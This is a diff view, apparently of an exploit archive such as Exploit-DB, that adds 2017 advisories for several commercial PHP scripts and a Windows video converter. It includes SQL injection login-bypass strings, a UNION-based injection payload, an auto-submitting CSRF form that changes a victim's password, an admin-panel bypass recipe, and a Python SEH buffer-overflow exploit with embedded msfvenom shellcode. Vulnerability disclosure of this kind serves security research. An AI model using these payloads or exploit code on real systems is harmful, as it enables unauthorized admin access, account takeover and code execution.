||||
#
|
||||
# Proof of Concept : -
|
||||
#
|
||||
# http://localhost/taxibooking/login.php [ set username and password ] to >> admin' or 1=1 -- -
|
||||
# you must choose the check box as current and existing user
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
# ========================================================
|
||||
# [+] Disclaimer
|
||||
#
|
||||
# Permission is hereby granted for the redistribution of this advisory,
|
||||
# provided that it is not altered except by reformatting it, and that due
|
||||
# credit is given. Permission is explicitly given for insertion in
|
||||
# vulnerability databases and similar, provided that due credit is given to
|
||||
# the author. The author is not responsible for any misuse of the information contained
|
||||
# herein and prohibits any malicious use of all security related information
|
||||
# or exploits by the author or elsewhere.
|
||||
#
|
||||
#
|
||||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
42
platforms/php/webapps/42583.txt
Executable file
42
platforms/php/webapps/42583.txt
Executable file
|
@ -0,0 +1,42 @@
|
|||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
||||
|
||||
<!--
|
||||
# Exploit Title: PHP Appointment Booking Script - injection login bypass
|
||||
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
|
||||
# Dork: N/A
|
||||
# Date: 28.08.2017
|
||||
# software link : http://www.phpscriptsmall.com/product/php-appointment-booking-script/
|
||||
# Version: 3.04
|
||||
# Category: Webapps
|
||||
# Tested on: windows64bit / mozila firefox
|
||||
#
|
||||
#
|
||||
--!>
|
||||
|
||||
# ========================================================
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin
|
||||
#
|
||||
# Proof of Concept : -
|
||||
#
|
||||
# http://localhost/appointment/admin_login.php [ set username and password ] to >> admin' or 1=1 -- -
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
# ========================================================
|
||||
# [+] Disclaimer
|
||||
#
|
||||
# Permission is hereby granted for the redistribution of this advisory,
|
||||
# provided that it is not altered except by reformatting it, and that due
|
||||
# credit is given. Permission is explicitly given for insertion in
|
||||
# vulnerability databases and similar, provided that due credit is given to
|
||||
# the author. The author is not responsible for any misuse of the information contained
|
||||
# herein and prohibits any malicious use of all security related information
|
||||
# or exploits by the author or elsewhere.
|
||||
#
|
||||
#
|
||||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
53
platforms/php/webapps/42584.txt
Executable file
53
platforms/php/webapps/42584.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
-----------------------------------------------------------------------------------
|
||||
|<!--
|
||||
# Exploit Title: User Login and Management PHP Script - multiple vulnerabilities
|
||||
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
|
||||
# Dork: N/A
|
||||
# Date: 29.08.2017
|
||||
# software link : https://www.codester.com/items/469/user-login-and-management-php-script
|
||||
# demo : http://froiden.cloudapp.net/LoginDashboard/index.php
|
||||
# Version: 3.04
|
||||
# Category: Webapps
|
||||
# Tested on: windows64bit / mozila firefox
|
||||
#
|
||||
#
|
||||
|--!>
|
||||
|
||||
|----------------------------------------------------------------------------------
|
||||
|
||||
1) admin dashboard authentication bypass
|
||||
|
||||
Description : An Attackers are able to completely compromise the web application built upon
|
||||
the user login and management php script as they can gain access to the admin panel and
|
||||
manage other users as an admin without authentication!
|
||||
|
||||
|
||||
Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php
|
||||
Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php
|
||||
|
||||
|
||||
Risk : Unauthenticated attackers are able to gain full access to the administrator panel
|
||||
and thus have total control over the application and users , including add admin user .. etc
|
||||
|
||||
|
||||
|----------------------------------------------------------------------------------
|
||||
|
||||
|
||||
2) account takeover - cross side request forgery
|
||||
|
||||
|
||||
Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password
|
||||
|
||||
> exploitation <
|
||||
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST">
|
||||
|
||||
<script type="text/javascript">document.csrf_form.submit();</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|-----------------------------------------EOF-----------------------------------------
|
30
platforms/php/webapps/42585.txt
Executable file
30
platforms/php/webapps/42585.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
# # # # #
|
||||
# Exploit Title: PHP Video Battle Script 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 28.08.2017
|
||||
# Vendor Homepage: http://www.rocky.nu/
|
||||
# Software Link: http://www.rocky.nu/product/php-video-battle/
|
||||
# Demo: http://videobattle.rocky.nu/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/[SQL].html
|
||||
#
|
||||
# -1'+uNiOn+SeleCt++0x31,0x32,0x33,0x34,0x35,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x37+--+--+-.html
|
||||
#
|
||||
# http://localhost/[PATH]/videobattle.html?vote=[SQL]
|
||||
# http://localhost/[PATH]/videobattle.html?draw=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
59
platforms/windows/local/42586.py
Executable file
59
platforms/windows/local/42586.py
Executable file
|
@ -0,0 +1,59 @@
|
|||
|
||||
#!/usr/bin/python
|
||||
|
||||
###############################################################################
|
||||
# Exploit Title: Easy Vedio to PSP Converter 1.6.20 - Local Buffer Overflow (SEH)
|
||||
# Date: 28-08-2017
|
||||
# Exploit Author: Kishan Sharma
|
||||
# Email : thekishansharma@gmail.com
|
||||
# Vulnerable Software: Easy Vedio to PSP Converter
|
||||
# Vendor Homepage: http://www.divxtodvd.net/
|
||||
# Version: 1.6.20
|
||||
# Software Link: http://www.divxtodvd.net/easy_video_to_psp.exe
|
||||
# Tested On: Windows 7 x64
|
||||
# To reproduce the exploit:
|
||||
# 1. Click Register
|
||||
# 2. In the "Enter User Name" field, paste the content of test.txt
|
||||
#
|
||||
##############################################################################
|
||||
|
||||
|
||||
buffer = "\x41" * 1008 #Junk
|
||||
|
||||
nSEH = "\xeb\x10\x90\x90" #Short Jump
|
||||
|
||||
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
|
||||
SEH = "\x59\x78\x03\x10"
|
||||
|
||||
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
|
||||
|
||||
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
|
||||
buf = ""
|
||||
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
|
||||
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
|
||||
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
|
||||
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
|
||||
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
|
||||
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
|
||||
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
|
||||
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
|
||||
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
|
||||
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
|
||||
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
|
||||
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
|
||||
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
|
||||
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
|
||||
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
|
||||
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
|
||||
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
|
||||
|
||||
nops = "\x90" * 16 #Nops
|
||||
|
||||
badchars = "\x0a\x0d"
|
||||
|
||||
data = buffer + nSEH + SEH + nops + buf
|
||||
|
||||
f = open ("test.txt", "w")
|
||||
f.write(data)
|
||||
f.close()
|
||||
|
Loading…
Add table
Reference in a new issue